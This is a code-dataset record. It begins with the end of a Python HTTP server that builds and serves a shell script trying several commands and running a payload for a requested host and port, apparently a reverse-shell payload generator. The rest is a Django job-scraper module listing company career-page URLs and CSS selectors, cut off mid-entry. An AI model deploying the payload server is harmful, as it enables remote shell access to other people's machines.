Checks whether the command exists. If so, executes the payload.\n payload += \"\"\"\nif command -v {} > /dev/null 2>&1; then\n {}\n exit;\nfi\\n\"\"\".format(key, value)\n\n return payload\n\nclass HttpRequestHandler(http.server.SimpleHTTPRequestHandler):\n \"\"\"HTTP request handler.\"\"\"\n\n def do_GET(self):\n \"\"\"Returns the payload or usage information;\"\"\"\n\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/plain\")\n self.end_headers()\n\n host_port = urlparse(self.path).path[1:]\n if is_valid(host_port):\n self.wfile.write(bytes(generate_sh(host_port), \"utf8\"))\n return\n\n self.wfile.write(bytes(USAGE, \"utf8\"))\n\n return\n\ndef main():\n \"\"\"Main function.\"\"\"\n\n handler_object = HttpRequestHandler\n server = socketserver.TCPServer((\"\", PORT), handler_object)\n if HTTPS:\n server.socket = ssl.wrap_socket(server.socket, server_side=True,\n keyfile=KEY_FILE, certfile=CERT_FILE)\n server.serve_forever()\n\nif __name__ == \"__main__\":\n main()\n"
}
] | 2 |
venkateshmoback/spider
|
https://github.com/venkateshmoback/spider
|
422521c553a8186e5a060a938e754b3b0e904c6a
|
cee953909cba00984a8bbb366ea726a34f831c02
|
d8ca802b05634d29237fce23fe77959044ab089a
|
refs/heads/master
| 2020-06-11T19:16:21.234879 | 2019-06-27T09:06:34 | 2019-06-27T09:06:34 | 194,058,691 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.3644377887248993,
"alphanum_fraction": 0.3804927468299866,
"avg_line_length": 40.54163360595703,
"blob_id": "deba5f0f5bd7ca1f3604a2ebcf10c59747528e12",
"content_id": "3a314dcaeb6ad5c0507e7d014804c0e461683cfb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 51386,
"license_type": "no_license",
"max_line_length": 359,
"num_lines": 1237,
"path": "/django/spiderapp/views.py",
"repo_name": "venkateshmoback/spider",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.views.generic import TemplateView\nimport requests\nfrom bs4 import BeautifulSoup as sp\nimport time\nfrom bs4 import BeautifulSoup as soup\nimport ssl\nimport traceback\nimport shutil\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.poolmanager import PoolManager\n\nimport urllib.request\n\nimport pandas as pd\nimport json\nimport argparse\nfrom pymongo import MongoClient\nimport json\nfrom spiderapp.forms import HomePage\n\nCOMPANY_LIST = dict()\n# Create your views here.\n\nclass HomePageView(TemplateView):\n\n\tdef __init__(self):\n\t\t\n\n\t#Adding hosting addres to the carrier page \n\n\t\tself.ebags='https://www.ebags.com'\n\t\tself.aetna='/search-jobs'\n\n\t\tself.lovesac='https://www.lovesac.com'\n\t\tself.rhone='https://www.rhone.com'\n\t\tself.altria='?src=leftnav'\n\t\tself.altria_1='http://www.altria.com'\n\t\tself.dell='https://jobs.delltechnologies.com'\n\t\tself.tableau='https://careers.tableau.com'\n\n\t\tself.arin='https://www.arin.net'\n\n\t\tself.accenture='https://www.accenture.com'\n\t\tself.jpcycles='https://www.jpcycles.com'\n\n\t\tself.gigaom='https://gigaom.com'\n\n\t\tself.zoomcare='https://www.zoomcare.com'\n\n\t\tself.walmart='https://careers.walmart.com'\n\n\t\tself.hsn='https://jobs.hsn.com'\n\t\tself.irs ='https://www.jobs.irs.gov'\n\n\t\tself.thinkchamp='http://www.thinkchamplin.com'\n\n\t\tself.lyondell='https://careers.lyondellbasell.com'\n\t\tself.lpl='https://careers.lpl.com'\n\t\tself.sbarro='https://sbarro.jobs.net'\n\t\tself.newscrop='https://newscorp.com'\n\t\tself.key='https://www.key.com'\n\n\t\tself.disney='https://jobs.disneycareers.com'\n\n\t\tself.warnermedia='https://www.att.jobs/'\n\n\t\tself.verizon='https://www.verizon.com'\n\n\t\tself.tapestry ='https://careers.tapestry.com'\n\n\t\tself.iac='https://www.iac.com'\n\n\t\tself.startribune='https://jobs.startribune.com'\n\n\t\tself.masco='https://jobs.masco.com'\n\t\tself.lazboy='http://jobs.jobvite.com'\n\n\t\tself.jiffymix='https://site.jiffymix.com/'\n\n\t\tself.spartanmash='https://careers.spartannash.com'\n\n\t\tself.starrett='http://www.starrett.com'\n\n\t\tself.manulife='https://jobs.manulife.com'\n\n\t\tself.fidelity='https://jobs.fidelity.com'\n\n\t\tself.yum='https://www.yum.com'\n\n\t\tself.rjcorman='https://wfa.kronostm.com/index.jsp'\n\n\t\tself.lexmark='https://www.lexmark.com'\n\n\t\tself.heavenhill='http://www.heavenhill.com'\n\n\t\tself.moback ='https://www.moback.com'\n\t#passing the job portal id's\n\n\tJobportal_initials = {\n\t 'tdxcorp': {\n\t 'search_link' : 'https://www.tdxcorp.com',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#mega-menu-item-754',\n\t 'title' : None,\n\t 'carrier_page_2' : None\n\t }\n\t }, \n\t \n\t 'ebags': {\n\t 'search_link' : 'https://www.ebags.com',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#footerCICareers',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t }, \n\t 'gartner': {\n\t 'search_link' : 'https://www.gartner.com/en',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > div.emt-container > footer > section > div > div.row.mg-t30.mg-b30 > div:nth-child(1) > ul > li:nth-child(2) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t }, \n\t \n\t 'lovesac': {\n\t 'search_link' : 'https://www.lovesac.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#page-container > footer > section > div.bpc-nav-links.footer-group-1 > a:nth-child(3)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'rhone': {\n\t 'search_link' : 'https://www.rhone.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'div.global_footer-section-list:nth-child(1) > a:nth-child(4)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'ediblearrangements': {\n\t 'search_link' : 'https://www.ediblearrangements.com/edible-careers/edible-arrangements-careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'div.brnButton',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'altria': {\n\t 'search_link' : 'http://www.altria.com/people-and-careers/training/Pages/default.aspx',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'li.static:nth-child(3) > a:nth-child(1)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'redrobin': {\n\t 'search_link' : 'https://www.redrobin.com/careers/management-jobs.html',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '.ide20407a9-26b5-48a8-acca-b68ef0c85c19 > a:nth-child(2)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'kaiseraluminum': {\n\t 'search_link' : 'http://www.kaiseraluminum.com/careers/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > section.main > div > div > div',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'dell': {\n\t 'search_link' : 'https://jobs.delltechnologies.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#content > section:nth-child(1) > ul > li:nth-child(1) > div > p:nth-child(3) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'yokesfreshmarkets': {\n\t 'search_link' : 'https://www.yokesfreshmarkets.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#block-menu-menu-more > div > ul > li:nth-child(3) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'costargroup': {\n\t 'search_link' : 'https://www.costargroup.com/careers/research-opportunities',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#aplNowbtn',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'tableau': {\n\t 'search_link' : 'https://careers.tableau.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#seeAllCareersBtn > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'safeboats': {\n\t 'search_link' : 'http://www.safeboats.com/company/careers.php',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > table > tbody > tr:nth-child(3) > td > table > tbody > tr:nth-child(2) > td.ContentZone-TopShadow > div:nth-child(10) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'darigold': {\n\t 'search_link' : 'https://www.darigold.com/contact/careers/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > div > div > main > section > div > div > div > p:nth-child(4) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'arin': {\n\t 'search_link' : 'https://www.arin.net/about/welcome/careers/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#main-con > div > div.right-rail.right-rail-wide > ul:nth-child(2) > li > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\n\t 'quest': {\n\t 'search_link' : 'https://www.quest.com/company/careers.aspx',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#overview > div > div.hero-cta.mt-30.mb-30.cta-container > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'accenture': {\n\t 'search_link' : 'https://www.accenture.com/in-en',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#primaryLink4_Careers > div:nth-child(1) > div:nth-child(1) > ul:nth-child(1) > li:nth-child(3) > ul:nth-child(3) > li:nth-child(1)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'iridium': {\n\t 'search_link' : 'https://www.iridium.com/company-info/careers/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#primaryLink4_Careers > div:nth-child(1) > div:nth-child(1) > ul:nth-child(1) > li:nth-child(3) > ul:nth-child(3) > li:nth-child(1)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'ionaudio': {\n\t 'search_link' : 'https://www.ionaudio.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '.ion-footer-menu > ul:nth-child(3) > li:nth-child(3) > span:nth-child(1) > a:nth-child(1)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'jpcycles': {\n\t 'search_link' : 'https://www.jpcycles.com/motorcyclesuperstore?utm_source=mssrd',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '.col_4_5_12 > ul:nth-child(2) > li:nth-child(7) > a:nth-child(1)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'lancair': {\n\t 'search_link' : 'https://lancair.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#menu-item-1650 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'gigaom': {\n\t 'search_link' : 'https://gigaom.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#menu-item-960019 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'bpa': {\n\t 'search_link' : 'https://www.bpa.gov/careers/Pages/default.aspx',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#WebPartWPQ1 > ul > li > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'colheli': {\n\t 'search_link' : 'https://www.colheli.com/careers/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#page-section-5 > div.page-section-content.vc_row-fluid.mk-grid > div.mk-padding-wrapper.wpb_row > div > div:nth-child(2) > div.wpb_column.vc_column_container.vc_col-sm-8 > div > div > div.vc_btn3-container.col-btn.vc_btn3-center > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'zoomcare': {\n\t 'search_link' : 'https://www.zoomcare.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#__layout > div > div.MainFooter > div:nth-child(4) > div > div > div > div > div > div:nth-child(6) > ul > li:nth-child(3) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'dobson': {\n\t 'search_link' : 'https://www.dobson.net/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#menu-item-1864 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'columbiasussex': {\n\t 'search_link' : 'http://www.columbiasussex.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#menu-item-120 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'deltaprivatejets': {\n\t 'search_link' : 'https://www.deltaprivatejets.com/about-delta-private-jets/#careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#careers > div > div > div > div > div > p:nth-child(4) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'siemens': {\n\t 'search_link' : 'https://new.siemens.com/global/en/company/jobs.html',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'div.references-teaser__button > a:nth-child(1)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'walmart': {\n\t 'search_link' : 'https://careers.walmart.com/stores-clubs/walmart-management-jobs',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > main > section.hero.hero--has-cta > div.container.grid.grid--spaced.grid--bottom > div > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'hsn': {\n\t 'search_link' : 'https://jobs.hsn.com/jobs-by-category',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#content > div.job-category > ul > li',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'scripps': {\n\t 'search_link' : 'https://scripps.com/careers/find-a-job/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > div.site > section.basic-content.pb-30 > div > div > div > p:nth-child(3) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'dinsmore': {\n\t 'search_link' : 'https://www.dinsmore.com/careers/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#menu-item-26544 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'ge': {\n\t 'search_link' : 'https://www.ge.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#wrapper > div.layout.container > div.inner-layout > nav.navbar.navbar-default > div > ul > li:nth-child(3) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'irs': {\n\t 'search_link' : 'https://www.jobs.irs.gov/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#block-system-main-menu > ul > li.leaf',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'bostonbeer': {\n\t 'search_link' : 'http://www.bostonbeer.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#block-careers-2 > ul > li > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'turnerconstruction': {\n\t 'search_link' : 'http://www.turnerconstruction.com/careers/jobs',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#content-side > div > strong > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'duke-energy': {\n\t 'search_link' : 'https://www.duke-energy.com/our-company/careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > main > div:nth-child(2) > section:nth-child(2) > div > footer > p > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'thinkchamplin': {\n\t 'search_link' : 'http://www.thinkchamplin.com/sitemap',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > main > div > div.page__main-content > div > div > div > ul > ul:nth-child(2) > li:nth-child(1) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'lyondellbasell': {\n\t 'search_link' : 'https://careers.lyondellbasell.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#leftcolumn > div > div:nth-child(2n)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'ashland': {\n\t 'search_link' : 'https://www.ashland.com/about/careers/careers-at-ashland',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#leftColumn > div > div > p:nth-child(2) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'lpl': {\n\t 'search_link' : 'https://careers.lpl.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'p.view-all',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'sbarro': {\n\t 'search_link' : 'https://sbarro.jobs.net/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#landing-blob-section > tn-content > p:nth-child(15) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'paramount': {\n\t 'search_link' : 'https://www.paramount.com/inside-studio/studio/careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#block-system-main > div > article > div > p:nth-child(5) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'newscorp': {\n\t 'search_link' : 'https://newscorp.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#menu-item-6669 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'key': {\n\t 'search_link' : 'https://www.key.com/about/careers.jsp',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#main > article > div.page__content > div:nth-child(2) > div > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'warnerbroscareers': {\n\t 'search_link' : 'https://www.warnerbroscareers.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#menu-header-menu > li.menu-item.menu-item-type-post_type.menu-item-object-page.menu-item-1651 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'disneycareers': {\n\t 'search_link' : 'https://jobs.disneycareers.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#content > section.featured-jobs > ul > li',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'warnermedia': {\n\t 'search_link' : 'https://www.att.jobs/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#category-group-warapper > div.job-keyword > ul > li',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'verizon': {\n\t 'search_link' : 'https://www.verizon.com/about/work',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#search_form > div.sj_col.search_jobs__button > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'usv': {\n\t 'search_link' : 'https://www.usv.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#site-header > div.container > nav > ul.nav.nav-sections.navbar-nav.pull-right.collapse.navbar-toggleable-xs > li:nth-child(5) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'pall': {\n\t 'search_link' : 'https://www.pall.com/en/careers.html',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > main > div > div > div.career-link.parbase.section > section > div > section.col-33.career-link__container__content__right > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'lillianvernon': {\n\t 'search_link' : 'https://www.lillianvernon.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > div.page-wrapper > footer > div > div.row > div:nth-child(3) > div > div.block-content > ul > li:nth-child(5) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'tapestry': {\n\t 'search_link' : 'https://careers.tapestry.com/viewalljobs/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#categorylist > ul > li',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'iac': {\n\t 'search_link' : 'https://www.iac.com/careers/overview',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#block-menu-block-1 > ul > li.menu-mlid-11662 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'hain': {\n\t 'search_link' : 'http://www.hain.com/careers/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#purple-bg-content > div > p:nth-child(3) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'travelers': {\n\t 'search_link' : 'https://careers.travelers.com/?_ga=2.1712306.2067520576.1539166870-148981798.1539166870',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#menu-item-4510 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'pentair': {\n\t 'search_link' : 'https://www.pentair.com/en/about-pentair/careers.html',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > div.sitewide-width-wrapper > main > div.main-content > div:nth-child(1) > section > article > div > div.col-xs-12.col-sm-5 > div > div.cta.parbase.section > div > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'infor': {\n\t 'search_link' : 'https://www.infor.com/about',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'div.splitBackground-action > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'fico': {\n\t 'search_link' : 'https://www.fico.com/en/careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#nav-tab--overview-0 > div > div:nth-child(1) > p > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'startribune': {\n\t 'search_link' : 'https://jobs.startribune.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#main > div.band.band--primary.band--primary--third.cf > div > section > div > div > ul > li',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'landolakesinc': {\n\t 'search_link' : 'https://www.landolakesinc.com/Careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#wrapper > section > div:nth-child(3) > div > div.small-12.columns.find-your-career > div',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'brsaerospace': {\n\t 'search_link' : 'https://brsaerospace.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#menu-item-894 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'abdallahcandies': {\n\t 'search_link' : 'https://www.abdallahcandies.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#menu-item-38499 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t '3m': {\n\t 'search_link' : 'https://www.3m.com/3M/en_US/careers-us/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#pageContent > div.MMM--grids > div > div.component-control.id-Z7_79L2HO02KO83D0Q8I9A4RCI6S1 > div > div > div > div.MMM--featuredBox > div.MMM--tableGrids.MMM--tableGrids_mobile > div.MMM--tableGrids-col.MMM--tableGrids-col_50.MMM--tableGrids-col_border.MMM--tableGrids-col_omega > ul > li:nth-child(2) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'demanddetroit': {\n\t 'search_link' : 'https://demanddetroit.com/our-company/careers/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > comp-glue:nth-child(6) > comp-callout > inner-content > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'westbornmarket': {\n\t 'search_link' : 'https://www.westbornmarket.com/careers-westborn/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#genesis-content > article > div > div > div.wpb_column.vc_column_container.vc_col-sm-9 > div > div > div > div > p:nth-child(4) > a:nth-child(2)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'quickenloans': {\n\t 'search_link' : 'https://quickenloanscareers.com/?qlsource=nav',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#single-blocks > div > div.vc_row.wpb_row.vc_row-fluid.home__hero.vc_custom_1521122111165.wpex-vc_row-has-fill > div:nth-child(1) > div > div > div:nth-child(2) > div:nth-child(2) > div > div > div.wpb_text_column.wpb_content_element.vc_custom_1545437224404.section-2-copy > div > p:nth-child(2) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'lazboy': {\n\t 'search_link' : 'http://jobs.jobvite.com/la-z-boy-review/search?r=&d=&q=',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > div > div > div > div.all-job-list > div:nth-child(1) > p > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'jiffymix': {\n\t 'search_link' : 'https://site.jiffymix.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#colophon > div.footer_container > div:nth-child(4) > ul > ul > li:nth-child(5) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'gm': {\n\t 'search_link' : 'http://www.fabri-kal.com/careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#available-positions > div > header > p > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'spartanmash': {\n\t 'search_link' : 'https://careers.spartannash.com/creative/career-retail',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#content > section.copy.roles > p > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'cybexintl': {\n\t 'search_link' : 'https://www.cybexintl.com/company/careers/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#body-container > div:nth-child(3) > div',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'zoomtel': {\n\t 'search_link' : 'http://www.zoomtel.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#footer_main > div > div.footer-main-menu > ul.about-zoom-menu > li:nth-child(5) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'capeair': {\n\t 'search_link' : 'https://www.capeair.com/about_us/careers/index.html',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > div.container-wrapper.page-content > div > div > table > tbody > tr > td',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'starrett': {\n\t 'search_link' : 'http://www.starrett.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#ContentPlaceHolder9_TB3D0EC21005 > div > div > div > ul > li:nth-child(5) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'manulife': {\n\t 'search_link' : 'https://jobs.manulife.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#main-content > section.image-callouts.featured-careers > div > div > div',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'fidelity': {\n\t 'search_link' : 'https://jobs.fidelity.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#home-page > header > nav > div.nav-wrap.container > div > ul > li:nth-child(6) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'eatonvance': {\n\t 'search_link' : 'https://www.eatonvance.com/careers.php',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > main > div > div > center:nth-child(1) > div > div > div > div.col-sm-10 > div > div:nth-child(2) > div > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'cabotcorp': {\n\t 'search_link' : 'http://www.cabotcorp.com/company/careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#modules-container > div.promo-module.image.dark-text > div > div > a',\n\t 'title' : None,\n\t 'carrier_page_2' 